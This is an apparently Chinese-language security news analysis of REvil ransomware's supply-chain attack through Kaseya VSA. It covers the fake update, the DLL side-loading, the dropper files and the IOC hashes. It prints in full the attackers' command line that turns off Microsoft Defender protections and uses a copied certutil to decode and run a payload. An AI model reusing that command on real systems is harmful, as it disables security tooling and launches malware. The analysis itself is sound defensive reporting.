REvil勒索软件团伙利用Kaseya VSA发起大规模供应链攻击

REvil勒索软件团伙在其暗网数据泄漏站点上发布了一条消息，声称他们已于2021年7月2日入侵了MSP提供商Kaseya，并表明已有100万个系统受到勒索软件的影响。该团伙要求Kaseya支付7000万美元的BTC，以为所有受害者公开发布解密器。

Kaseya是一家IT服务提供商，提供自动化软件和远程管理软件，该公司在7月2日发布声明，确认其下远程监控和管理软件工具Kaseya VSA遭到攻击，目前已经关闭了其SaaS服务器，并且建议所有客户关闭VSA服务器。

研究人员表明，REvil勒索软件针对Kaseya VSA执行的大规模供应链攻击，已经影响了多家托管服务提供商(MSP)及其客户，如Synnex Corp和Avtex LLC。勒索软件是通过产品的自动更新机制分发的。Kaseya VSA具有客户端系统的管理员权限，这使得勒索软件可以客户系统中轻松传播。

Kaseya VSA 是一个自动化的软件补丁和漏洞管理系统。REvil勒索软件团伙通过嵌入恶意DLL文件的Kaseya VSA代理修复程序，利用虚假恶意更新向客户端投递REvil加密器有效载荷。名为“agent.exe”的代理修复程序使用“MsMpEng.exe”防御程序可执行文件，侧加载到合法的Microsoft Defender中。

技术分析

研究人员近期发现REvil勒索软件样本的哈希值为D55F983C994CAA160EC63A59F6B4250FE67FB3E8C43A388AEC60A4A6978E9F1E。

该勒索软件主要由一个释放器，以及VC编译的、包含“SOFTIS”和“MODLIS”恶意资源的二进制文件组成。如下图所示，该样本在运行时会加载资源，资源文件是REvil有效载荷“mpsvc.dll”和“MsMpEng.exe”加载器(loader)。

Dropper

执行时，释放器会在以下系统目录中创建REvil有效载荷和loader文件。

• C:Windowsmpsvc.dll(在合法的Microsoft Defender中侧加载)

• C:WindowsMsMpEng.exe(合法loader文件)

下图显示了释放到受害者机器上的有效载荷，及其执行过程。

有效载荷

成功安装后，REvil有效载荷会立即加密所有文档文件。

进程浏览器

最后，勒索软件会锁定受害者的屏幕，并附上勒索说明。此外，REvil还会试图执行PowerShell 命令，以禁用Microsoft Defender服务：

C:WINDOWSsystem32cmd.exe” /c ping 127.0.0.1 -n 4979 > nul & C:WindowsSystem32WindowsPowerShell1.0powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:WindowsSystem32certutil.exe C:Windowscert.exe & echo %RANDOM% >> C:Windowscert.exe & C:Windowscert.exe -decode c:kworkingagent.crt c:kworkingagent.exe & del /q /f c:kworkingagent.crt C:Windowscert.exe & c:kworkingagent.exe

研究人员发现每个系统都使用不同的扩展名进行加密，这表明勒索软件可能是通过系统信息随机生成扩展名的。

勒索说明文件中包含一个链接，其只能通过文件中的密钥访问。该链接属于REvil勒索软件团伙，其中包含与赎金金额、解密器和计时器相关的信息。

IOC

8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd

e2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2

d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e

9b46d03b690bda0df57c0ebb8dae0aebdd1d131beb500242fa8fe59cb260eed1

hxxp[:]//aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd[.]onion